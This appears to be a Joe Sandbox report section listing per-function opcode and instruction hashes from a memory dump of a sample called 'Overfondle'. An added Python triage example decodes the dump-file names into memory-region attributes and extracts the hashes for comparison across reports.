                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed90f560dc21eb5c5f32a931b19b0d31ba190ae7ebd6584c2e3aacd67f962841
                                                                        • Instruction ID: 771a01186b6b6b1617cf07b33ad78dc8356290edb959df7b420dad2af17b7ddc
                                                                        • Opcode Fuzzy Hash: ed90f560dc21eb5c5f32a931b19b0d31ba190ae7ebd6584c2e3aacd67f962841
                                                                        • Instruction Fuzzy Hash: 69119172241518FFD312CBE9CD44F8A77A8EB59B94F11C029F614DB261DAB8DD01C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 902fe03a55312d56913b073f6e6a54c45b35bdd21c7f67f67775a934f5513145
                                                                        • Instruction ID: da3e9ef7b10e384dbce9556eac271e35b85b1cc91f359610d156582ab2a8f2bc
                                                                        • Opcode Fuzzy Hash: 902fe03a55312d56913b073f6e6a54c45b35bdd21c7f67f67775a934f5513145
                                                                        • Instruction Fuzzy Hash: 2D1144773001149FCB19DBA6CC85B5B76A6EBD5678B35CA39E922CB390D9388C02C391
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65761e81414c01c8207790557e97470c89b215bef0eb2d832e4fc2aee11ffa1e
                                                                        • Instruction ID: 43d25a95b4428222d0a72d3d40aa40ba6339aa3ca954e50546838be1ec55c6ee
                                                                        • Opcode Fuzzy Hash: 65761e81414c01c8207790557e97470c89b215bef0eb2d832e4fc2aee11ffa1e
                                                                        • Instruction Fuzzy Hash: 48118F76A01288DFCB15CFD9C980E4ABFF4EB98658B11C0BDE9049B321D638DD01DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction ID: e812171eb9116f8aef5590f951aa0089f077eeae02436dde04f75fb48e8461cf
                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction Fuzzy Hash: A511EF32A00919AFDB19CB94C845B9EBBB5EF84210F058269F855A7380E635EE41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction ID: a4fbc17297ac9aae9156ae1cfb30e72dcf33d3c28444857d0aa592a7ffee18cf
                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction Fuzzy Hash: 4E21E3B5A40B059FD3A0CF69C441B52BBF4FB48B10F10892EE98ACBB50E375E814CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction ID: d4fe7e1542525f7b16d9118a74cbe082f58d04b6c94a6d7ccc94642bdd6b254c
                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction Fuzzy Hash: 60118C31A00600EBD720ABC7C841B4677E5FB55B56F11C82CEA4C9B260EB79DD44DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f23e1f3ef215eab5a2ee76333091d57a141aa886d181413b3df77c0473acb2c5
• Instruction ID: cb704de55016a006c5ef6393c8604a56266ec06b43c7ce8e33956fedabe7fa09
• Opcode Fuzzy Hash: f23e1f3ef215eab5a2ee76333091d57a141aa886d181413b3df77c0473acb2c5
• Instruction Fuzzy Hash: 76012275606644AFE312A2EADD84F576B9DEF8079CF15C47AFD008B651EA2CDC01C2A2
Uniqueness
Uniqueness Score: -1.00%

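The dump names in these entries carry the attributes of the region the functions were lifted from: for this sample, a committed, private (not image-backed) region at 0x20430000 that is both writable and executable and still contains a PE header, which is what a manually mapped, unpacked stage looks like in memory. The following Python is an added example, not Joe Sandbox code or part of this report, that decodes such a name and pulls the per-function hashes out of entries like the ones above so they can be pivoted against other reports. The field order of the `.sdmp` name (BaseAddress, Protect, State, Type after the process prefix) and the decimal reading of the process and run fields are assumptions, inferred from the values matching the Windows constants and the `hcaresult_8_2_20430000` snapshot name; the winnt.h constants themselves are not assumptions. The sample name and the two sample entries are copied from this section.

```python
"""Decode Joe Sandbox .sdmp dump names and pull per-function hashes out of report
entries like the ones in this section. Added example, not Joe Sandbox code.

Assumption (the page does not document it): after the <pid>.<run>.<tag> prefix an
.sdmp name carries the MEMORY_BASIC_INFORMATION fields BaseAddress, Protect,
State and Type as zero-padded hex; the values seen here (40, 1000, 20000)
decode to PAGE_EXECUTE_READWRITE / MEM_COMMIT / MEM_PRIVATE under that layout.
"""
import re
from dataclasses import dataclass

# winnt.h constants: fixed Windows values, not assumptions.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_COMMIT, MEM_IMAGE = 0x1000, 0x1000000
EXEC_PAGES, WRITE_PAGES = {0x10, 0x20, 0x40, 0x80}, {0x04, 0x08, 0x40, 0x80}

SDMP_RE = re.compile(
    r"^(?P<pid>\d{8})\.(?P<run>\d{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)


def _name(table: dict, value: int) -> str:
    return table.get(value, f"0x{value:x}")


@dataclass(frozen=True)
class Region:
    pid: int
    base: int
    protect: int
    state: int
    mem_type: int

    def describe(self) -> tuple:
        # (Protect, State, Type) as winnt.h names; modifier bits such as
        # PAGE_GUARD are masked off the protection value.
        return (_name(PAGE_PROTECT, self.protect & 0xFF),
                _name(MEM_STATE, self.state), _name(MEM_TYPE, self.mem_type))


def parse_sdmp(name: str) -> Region:
    """Split an .sdmp file name into region fields (layout per module docstring)."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    # pid read as decimal: the snapshot name hcaresult_8_2_20430000_... in the
    # same entry spells it as 8; for values >= 10 this is an assumption.
    return Region(int(m["pid"]), int(m["base"], 16), int(m["protect"], 16),
                  int(m["state"], 16), int(m["type"], 16))


def region_findings(r: Region, based_on_pe: bool) -> list:
    """Triage hints for a dumped region; an empty list means nothing unusual."""
    protect, state, mem_type = r.describe()
    findings = []
    if (r.protect & 0xFF) in EXEC_PAGES and (r.protect & 0xFF) in WRITE_PAGES:
        findings.append(f"writable+executable region ({protect})")
    if based_on_pe and r.mem_type != MEM_IMAGE:
        # A PE header in memory the loader never mapped (MEM_IMAGE) means the
        # module was written there by hand: an unpacked stage or injected payload.
        findings.append(f"PE header in non-image memory ({mem_type})")
    if r.state != MEM_COMMIT:
        findings.append(f"region not committed ({state})")
    return findings


ENTRY_RE = re.compile(
    r"Opcode ID:\s*(?P<opcode>[0-9a-f]{64}).*?Instruction ID:\s*(?P<insn>[0-9a-f]{64})"
    r".*?Opcode Fuzzy Hash:\s*(?P<ofuzzy>[0-9a-f]{64})"
    r".*?Instruction Fuzzy Hash:\s*(?P<ifuzzy>[0-9A-Fa-f]+)", re.S)


def extract_function_hashes(report_text: str) -> list:
    """Collect per-function identifiers for pivoting across reports, checking the
    invariant visible throughout this section: Opcode Fuzzy Hash == Opcode ID."""
    return [{"opcode_id": m["opcode"], "instruction_id": m["insn"],
             "instruction_fuzzy": m["ifuzzy"], "consistent": m["opcode"] == m["ofuzzy"]}
            for m in ENTRY_RE.finditer(report_text)]


# Sample input: the source-file name and two entries copied from this section.
SAMPLE_SDMP = ("00000008.00000002.2184375550.0000000020430000."
               "00000040.00001000.00020000.00000000.sdmp")
SAMPLE_ENTRIES = """\
• Opcode ID: f23e1f3ef215eab5a2ee76333091d57a141aa886d181413b3df77c0473acb2c5
• Instruction ID: cb704de55016a006c5ef6393c8604a56266ec06b43c7ce8e33956fedabe7fa09
• Opcode Fuzzy Hash: f23e1f3ef215eab5a2ee76333091d57a141aa886d181413b3df77c0473acb2c5
• Instruction Fuzzy Hash: 76012275606644AFE312A2EADD84F576B9DEF8079CF15C47AFD008B651EA2CDC01C2A2
• Opcode ID: 33dc4ca0bec6f41da06603af038be6e9ac3027ce3cb47de5082dc35e15c79511
• Instruction ID: 77507d01ef25a800ee4091de561bd03d0606283b4e99bf66991f8e68c2cbd70c
• Opcode Fuzzy Hash: 33dc4ca0bec6f41da06603af038be6e9ac3027ce3cb47de5082dc35e15c79511
• Instruction Fuzzy Hash: 5F11AC76200644AFCB15CFD9C880F467BA8EBDABAAF548119F9048B754E338EC40CF60
"""
```

Calling `region_findings(parse_sdmp(SAMPLE_SDMP), based_on_pe=True)` on the name above returns two findings, the RWX protection and the PE header in private memory; a name with Protect 00000002 and Type 01000000 (a read-only, loader-mapped image) returns none. `extract_function_hashes(SAMPLE_ENTRIES)` yields the two Instruction Fuzzy Hashes, which are the values worth carrying into other reports, since the Opcode and Instruction IDs are exact digests and only match identical code.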
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33dc4ca0bec6f41da06603af038be6e9ac3027ce3cb47de5082dc35e15c79511
• Instruction ID: 77507d01ef25a800ee4091de561bd03d0606283b4e99bf66991f8e68c2cbd70c
• Opcode Fuzzy Hash: 33dc4ca0bec6f41da06603af038be6e9ac3027ce3cb47de5082dc35e15c79511
• Instruction Fuzzy Hash: 5F11AC76200644AFCB15CFD9C880F467BA8EBDABAAF548119F9048B754E338EC40CF60
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3404897f8d10b978dfb58a2d099cbc37669f6f968eb31d30e527a254d5a5290
• Instruction ID: ce120fac84b63cfbc1286f3194b2f3a3bf81337944b990b12de3cbfc9bc39709
• Opcode Fuzzy Hash: e3404897f8d10b978dfb58a2d099cbc37669f6f968eb31d30e527a254d5a5290
• Instruction Fuzzy Hash: 65118272901759ABDB22DFE9C9C1B5EBBB8EF84B44F518469EA01A7300D738AD418B50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38edc44604211c6e0a5cc3caa82487c98372004d9a7e6704d8102b0de774acbe
• Instruction ID: 9792e793c8eb752a18ef39a9a67c25258a930357e55934db89e1209dec672804
• Opcode Fuzzy Hash: 38edc44604211c6e0a5cc3caa82487c98372004d9a7e6704d8102b0de774acbe
• Instruction Fuzzy Hash: B401D2711042049FC315CB9AC854F26BBF9EB91B18F20C56EE1048B270E778ED42DB90
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
• Instruction ID: f53ecfd1cfe48d72c67da2fd41c5e2e52340e26e03d8962cc107a0bb080cb77d
• Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
• Instruction Fuzzy Hash: 4011E5752016C1ABE71287E5C994B4577E4EB01B8CF2584A0EE4087752E33CCD43D252
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
• Instruction ID: d048963868e7e52dfc0ab0bf34c51dffb1102b29ebdd7da10073bf0328a1b990
• Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
• Instruction Fuzzy Hash: 3D01C032600104AFD7118BD7C801F5A77A9EF45B56F15C469FA089B260E779DD40C790
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
• Instruction ID: 501c9182258b0d6f686c8ef2b633e0591084345bda864b7b682a03723612fb7a
• Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
• Instruction Fuzzy Hash: B1012671405711AFC7208F95E841A227FB8EF65B60B00C9AEFC958B781C339D92DCBA0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ddf7b3ef2eeeb501fc6ad339572b033d2135748f0c4ab688150f6f4df202ce7e
• Instruction ID: 5373dadffbf02d2e241829a01aeecd68db5a09316c8bcda52cdc4403ba0a772c
• Opcode Fuzzy Hash: ddf7b3ef2eeeb501fc6ad339572b033d2135748f0c4ab688150f6f4df202ce7e
• Instruction Fuzzy Hash: C801D2735416109FC321CF98C940F43BBA8EB91774F218269E9A89B1A2E734ED01CFD0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d070ec2ba2f4635f0d3bb87bac071ff14ddf12d6dbed1f0c73c6fc0b5e4970b
• Instruction ID: 8b79de7f2e785887006b93b8406a74148e49af21c99ab7a6aad8de257a6e999d
• Opcode Fuzzy Hash: 1d070ec2ba2f4635f0d3bb87bac071ff14ddf12d6dbed1f0c73c6fc0b5e4970b
• Instruction Fuzzy Hash: 8011C432241240EFCB15DF99CD91F467BB8FF54B48F2044A9FA059B761D239ED01CA90
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5defa5a3f95bec71afb906b9e406661cd6fe7d922371922ad4abc7849034c35
• Instruction ID: b1d0a250db7c845d66e99f0eeed0aa3dd3185be7c7b5b67a1f9b0b6d0d408235
• Opcode Fuzzy Hash: b5defa5a3f95bec71afb906b9e406661cd6fe7d922371922ad4abc7849034c35
• Instruction Fuzzy Hash: 9711C270541218ABDB25DFA4CD52FD8B374AF14B14F60C1D8B714A61E0D738AE81DF94
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: afad561afa6c3d5d00ae5bd80c113858843733e7809685433e6071cbb8748c51
• Instruction ID: 5f698b426ebbba388461298e25b4e2a8004289a602ec9dc930ef5e278e0d3098
• Opcode Fuzzy Hash: afad561afa6c3d5d00ae5bd80c113858843733e7809685433e6071cbb8748c51
• Instruction Fuzzy Hash: F8111773900019ABCB11DBD5CC81EDFBB7CEF58258F048166A906A7211EA38AA15CBE0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction ID: dd3e3606ed6e4f94fd8929352295f76c72c660ea546fd8417544ee1459f70ede
• Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction Fuzzy Hash: 62014732601500ABDB008EE9D980F867BB6BFC4700F15C5A9EE048F347EA79DC81D7A0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 85db0d048c75925b39dfab16878e00573e6012b171de861ed291640dc85f624c
• Instruction ID: d6ccebe9ca8d31f911b8b2db168b7ca7e29a2bc1a0fcdba03d357fe08133196d
• Opcode Fuzzy Hash: 85db0d048c75925b39dfab16878e00573e6012b171de861ed291640dc85f624c
• Instruction Fuzzy Hash: 1211C832644149AFC300CFA8D810B92BBB9FB56314F18C159E848DF325D736ED45DBA0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 87d0245aba796ed5019be923ea71060f78bcd5a3014efea9b43ad7565cad1357
• Instruction ID: a2b272a49404df791166bcd7d8ecc4cd6ba8b3c7166c85a85ad9b4d552b1fd9c
• Opcode Fuzzy Hash: 87d0245aba796ed5019be923ea71060f78bcd5a3014efea9b43ad7565cad1357
• Instruction Fuzzy Hash: 7A111CB1A006099BCB00DF9AC581A9EB7F4FF58744F10806AB904E7351D678EE018BA4
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9179ccef16d83e78a098982cdf839c85c1794f8da12f8725776fca8b4911e195
• Instruction ID: 8f254733de63fbe15cf190f0d6e179814650f43b94c010d66eeec0b7c199ffb6
• Opcode Fuzzy Hash: 9179ccef16d83e78a098982cdf839c85c1794f8da12f8725776fca8b4911e195
• Instruction Fuzzy Hash: 95012431250210AFC3219BA18588E6EBFBBFF5DA54B24C82EF5045B620CB34DC41CB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
